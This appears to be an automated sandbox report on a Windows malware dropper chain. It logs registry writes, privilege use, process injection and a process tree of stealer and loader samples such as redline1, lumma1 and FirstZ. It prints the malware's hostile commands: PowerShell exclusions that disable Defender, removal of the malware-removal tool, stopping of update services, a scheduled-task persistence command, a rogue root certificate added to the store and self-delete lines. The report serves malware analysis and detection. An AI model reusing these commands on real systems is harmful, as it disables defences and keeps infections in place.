\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 keks.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 keks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1912 amers.exe 1912 amers.exe 4400 axplons.exe 4400 axplons.exe 3412 installer.exe 3412 installer.exe 4260 trf.exe 4260 trf.exe 3464 redline1.exe 3464 redline1.exe 5704 powershell.exe 5704 powershell.exe 5704 powershell.exe 3464 redline1.exe 3464 redline1.exe 3464 redline1.exe 3464 redline1.exe 5704 powershell.exe 5704 powershell.exe 5704 powershell.exe 5704 powershell.exe 6768 powershell.exe 6768 powershell.exe 2908 keks.exe 2908 keks.exe 6768 powershell.exe 3412 installer.exe 3412 installer.exe 6300 BVxPj6l9QxCZTHbu40cqRJcP.exe 6300 BVxPj6l9QxCZTHbu40cqRJcP.exe 6300 BVxPj6l9QxCZTHbu40cqRJcP.exe 6300 BVxPj6l9QxCZTHbu40cqRJcP.exe 4008 FirstZ.exe 6316 axplons.exe 6316 axplons.exe 6740 powershell.exe 6740 powershell.exe 6740 powershell.exe 2908 keks.exe 2908 keks.exe 2908 keks.exe 2908 keks.exe 1248 4767d2e713f2021e8fe856e3ea638b58.exe 1248 4767d2e713f2021e8fe856e3ea638b58.exe 4008 FirstZ.exe 4008 FirstZ.exe 4008 FirstZ.exe 4008 FirstZ.exe 4008 FirstZ.exe 4008 FirstZ.exe 5648 powershell.exe 5648 powershell.exe 1460 powershell.exe 1460 powershell.exe 4008 FirstZ.exe 4008 FirstZ.exe 4008 FirstZ.exe 4008 FirstZ.exe 4008 FirstZ.exe 2920 powershell.exe 2920 powershell.exe 5832 powershell.exe 5832 powershell.exe 1460 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 3412 installer.exe Token: SeDebugPrivilege 4260 trf.exe Token: SeBackupPrivilege 4260 trf.exe Token: SeSecurityPrivilege 4260 trf.exe Token: SeSecurityPrivilege 4260 trf.exe Token: SeSecurityPrivilege 4260 trf.exe Token: SeSecurityPrivilege 4260 trf.exe Token: SeDebugPrivilege 3464 redline1.exe Token: SeDebugPrivilege 5704 powershell.exe Token: SeDebugPrivilege 5144 Kaxhwswfup.exe Token: SeDebugPrivilege 5880 regasm.exe Token: SeDebugPrivilege 6768 powershell.exe Token: SeDebugPrivilege 2908 keks.exe Token: SeLockMemoryPrivilege 1480 439140.exe Token: SeManageVolumePrivilege 6300 BVxPj6l9QxCZTHbu40cqRJcP.exe Token: SeDebugPrivilege 1004 taskkill.exe Token: SeDebugPrivilege 6740 powershell.exe Token: SeLockMemoryPrivilege 3680 425616.exe Token: SeDebugPrivilege 1248 4767d2e713f2021e8fe856e3ea638b58.exe Token: SeImpersonatePrivilege 1248 4767d2e713f2021e8fe856e3ea638b58.exe Token: SeDebugPrivilege 1508 RegAsm.exe Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 5648 powershell.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeDebugPrivilege 5832 powershell.exe Token: SeShutdownPrivilege 6076 powercfg.exe Token: SeCreatePagefilePrivilege 6076 powercfg.exe Token: SeShutdownPrivilege 6056 powercfg.exe Token: SeCreatePagefilePrivilege 6056 powercfg.exe Token: SeShutdownPrivilege 6096 powercfg.exe Token: SeCreatePagefilePrivilege 6096 powercfg.exe Token: SeShutdownPrivilege 6036 powercfg.exe Token: SeCreatePagefilePrivilege 6036 powercfg.exe Token: SeDebugPrivilege 6092 powershell.exe Token: SeDebugPrivilege 5144 Kaxhwswfup.exe Token: SeDebugPrivilege 6244 8KKGFVK0Veg85868zSfIctOh.exe Token: SeImpersonatePrivilege 6244 8KKGFVK0Veg85868zSfIctOh.exe Token: SeDebugPrivilege 6628 powershell.exe Token: SeDebugPrivilege 6876 3m8qyPuMAiVuB9wnCRIyhvEJ.exe Token: SeImpersonatePrivilege 6876 3m8qyPuMAiVuB9wnCRIyhvEJ.exe Token: SeDebugPrivilege 5376 LoISfdzmXD8umnMNLvylqo1y.exe Token: SeImpersonatePrivilege 5376 LoISfdzmXD8umnMNLvylqo1y.exe Token: SeDebugPrivilege 5152 FKR0OwQ8FPy97VHjHRn7i28G.exe Token: SeImpersonatePrivilege 5152 FKR0OwQ8FPy97VHjHRn7i28G.exe Token: SeDebugPrivilege 4292 taskkill.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1480 439140.exe 3680 425616.exe 6300 BVxPj6l9QxCZTHbu40cqRJcP.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 6300 BVxPj6l9QxCZTHbu40cqRJcP.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 7116 360TS_Setup.exe 5548 360TS_Setup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4424 wrote to memory of 552 4424 0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe 85 PID 4424 wrote to memory of 552 4424 0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe 85 PID 4424 wrote to memory of 552 4424 0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe 85 PID 552 wrote to memory of 2472 552 explorku.exe 92 PID 552 wrote to memory of 2472 552 explorku.exe 92 PID 552 wrote to memory of 2472 552 explorku.exe 92 PID 552 wrote to memory of 1912 552 explorku.exe 94 PID 552 wrote to memory of 1912 552 explorku.exe 94 PID 552 wrote to memory of 1912 552 explorku.exe 94 PID 1912 wrote to memory of 4400 1912 amers.exe 96 PID 1912 wrote to memory of 4400 1912 amers.exe 96 PID 1912 wrote to memory of 4400 1912 amers.exe 96 PID 552 wrote to memory of 4644 552 explorku.exe 97 PID 552 wrote to memory of 4644 552 explorku.exe 97 PID 552 wrote to memory of 4644 552 explorku.exe 97 PID 552 wrote to memory of 3412 552 explorku.exe 100 PID 552 wrote to memory of 3412 552 explorku.exe 100 PID 4400 wrote to memory of 3232 4400 axplons.exe 101 PID 4400 wrote to memory of 3232 4400 axplons.exe 101 PID 4400 wrote to memory of 3232 4400 axplons.exe 101 PID 3232 wrote to memory of 1508 3232 alex.exe 102 PID 3232 wrote to memory of 1508 3232 alex.exe 102 PID 3232 wrote to memory of 1508 3232 alex.exe 102 PID 3232 wrote to memory of 1508 3232 alex.exe 102 PID 3232 wrote to memory of 1508 3232 alex.exe 102 PID 3232 wrote to memory of 1508 3232 alex.exe 102 PID 3232 wrote to memory of 1508 3232 alex.exe 102 PID 3232 wrote to memory of 1508 3232 alex.exe 102 PID 1508 wrote to memory of 2908 1508 RegAsm.exe 106 PID 1508 wrote to memory of 2908 1508 RegAsm.exe 106 PID 1508 wrote to memory of 2908 1508 RegAsm.exe 106 PID 1508 wrote to memory of 4260 1508 RegAsm.exe 107 PID 1508 wrote to memory of 4260 1508 RegAsm.exe 107 PID 4400 wrote to memory of 3792 4400 axplons.exe 109 PID 4400 wrote to memory of 3792 4400 axplons.exe 109 PID 4400 wrote to memory of 3792 4400 axplons.exe 109 PID 3792 wrote to memory of 3824 3792 gold.exe 111 PID 3792 wrote to memory of 3824 3792 gold.exe 111 PID 3792 wrote to memory of 3824 3792 gold.exe 111 PID 3792 wrote to memory of 3824 3792 gold.exe 111 PID 3792 wrote to memory of 3824 3792 gold.exe 111 PID 3792 wrote to memory of 3824 3792 gold.exe 111 PID 3792 wrote to memory of 3824 3792 gold.exe 111 PID 3792 wrote to memory of 3824 3792 gold.exe 111 PID 3792 wrote to memory of 3824 3792 gold.exe 111 PID 4400 wrote to memory of 3464 4400 axplons.exe 112 PID 4400 wrote to memory of 3464 4400 axplons.exe 112 PID 4400 wrote to memory of 3464 4400 axplons.exe 112 PID 4400 wrote to memory of 4376 4400 axplons.exe 114 PID 4400 wrote to memory of 4376 4400 axplons.exe 114 PID 4400 wrote to memory of 4376 4400 axplons.exe 114 PID 4376 wrote to memory of 4056 4376 install.exe 235 PID 4376 wrote to memory of 4056 4376 install.exe 235 PID 4376 wrote to memory of 4056 4376 install.exe 235 PID 4056 wrote to memory of 640 4056 cmd.exe 131 PID 4056 wrote to memory of 640 4056 cmd.exe 131 PID 4056 wrote to memory of 640 4056 cmd.exe 131 PID 4056 wrote to memory of 1356 4056 cmd.exe 118 PID 4056 wrote to memory of 1356 4056 cmd.exe 118 PID 4056 wrote to memory of 1356 4056 cmd.exe 118 PID 4056 wrote to memory of 1520 4056 cmd.exe 119 PID 4056 wrote to memory of 1520 4056 cmd.exe 119 PID 4056 wrote to memory of 1520 4056 cmd.exe 119 PID 4056 wrote to memory of 1944 4056 cmd.exe 120
Processes
-
C:\Users\Admin\AppData\Local\Temp\0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe"C:\Users\Admin\AppData\Local\Temp\0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"3⤵PID:2472
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"7⤵PID:2296
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 38⤵PID:1832
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 3326⤵
- Program crash
PID:1396
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3792 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:3824
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3464
-
-
C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\SysWOW64\sc.exeSc stop GameServerClient7⤵
- Launches sc.exe
PID:640
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameServerClient confirm7⤵
- Executes dropped EXE
PID:1356
-
-
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLink7⤵
- Launches sc.exe
PID:1520
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameSyncLink confirm7⤵
- Executes dropped EXE
PID:1944
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"7⤵
- Executes dropped EXE
PID:3836
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start GameSyncLink7⤵
- Executes dropped EXE
PID:1320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "6⤵PID:1288
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:640
-
-
C:\Windows\SysWOW64\sc.exeSc stop GameServerClientC7⤵
- Launches sc.exe
PID:4472
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameServerClientC confirm7⤵
- Executes dropped EXE
PID:3360
-
-
C:\Windows\SysWOW64\sc.exeSc delete PiercingNetLink7⤵
- Launches sc.exe
PID:2528
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove PiercingNetLink confirm7⤵
- Executes dropped EXE
PID:376
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"7⤵
- Executes dropped EXE
PID:3048
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start PiercingNetLink7⤵
- Executes dropped EXE
PID:2312
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "6⤵PID:6008
-
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLinks7⤵
- Launches sc.exe
PID:6116
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameSyncLinks confirm7⤵
- Executes dropped EXE
PID:2628
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"7⤵
- Executes dropped EXE
PID:6948
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start GameSyncLinks7⤵
- Executes dropped EXE
PID:6976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "6⤵PID:6528
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:400 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Checks processor information in registry
PID:3816
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:376 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:4856
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:2204 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F6⤵
- Creates scheduled task(s)
PID:5172
-
-
C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe"C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:5368 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 4607⤵
- Program crash
PID:1636
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 5207⤵
- Program crash
PID:5164
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 5607⤵
- Program crash
PID:5916
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 7807⤵
- Program crash
PID:6560
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 6327⤵
- Program crash
PID:5796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 5887⤵
- Program crash
PID:4388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 9687⤵
- Program crash
PID:6828
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 10127⤵
- Program crash
PID:1392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 13407⤵
- Program crash
PID:5400
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "dl.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe" & exit7⤵PID:2176
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "dl.exe" /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe"6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:5868 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 4607⤵
- Program crash
PID:5452
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6768
-
-
C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3500 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6628
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe"C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:4008 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6740
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart7⤵PID:5360
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart8⤵PID:5652
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc7⤵
- Launches sc.exe
PID:5692
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:6216
-
-
